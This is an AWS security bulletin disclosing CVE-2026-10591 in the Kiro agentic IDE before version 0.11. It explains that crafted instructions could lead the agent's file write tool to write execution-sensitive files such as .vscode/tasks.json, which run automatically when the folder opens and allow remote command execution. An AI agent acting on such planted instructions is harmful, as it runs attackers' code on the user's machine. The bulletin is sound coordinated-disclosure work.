Bulletin ID: 2026-037-AWS
Scope: AWS
Content Type: Important (requires attention)
Publication Date: 06/02/2026 08:45 AM PDT

Description:

Kiro is an agentic IDE users install on their desktop. We identified CVE-2026-10591. Insufficient access control restrictions in the file write tool in Kiro IDE prior to version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause writes to execution-sensitive paths (such as .vscode/tasks.json), enabling auto-execution on folder open.

Impacted versions: <0.11

Resolution:

This issue has been addressed in Kiro IDE version 0.11. We recommend upgrading to the latest version.

Workarounds:

No workaround available.

References:

• CVE-2026-10591

Acknowledgement:

We would like to thank Cymulate for collaborating on this issue through the coordinated vulnerability disclosure process.

Please email aws-security@amazon.com with any security questions or concerns.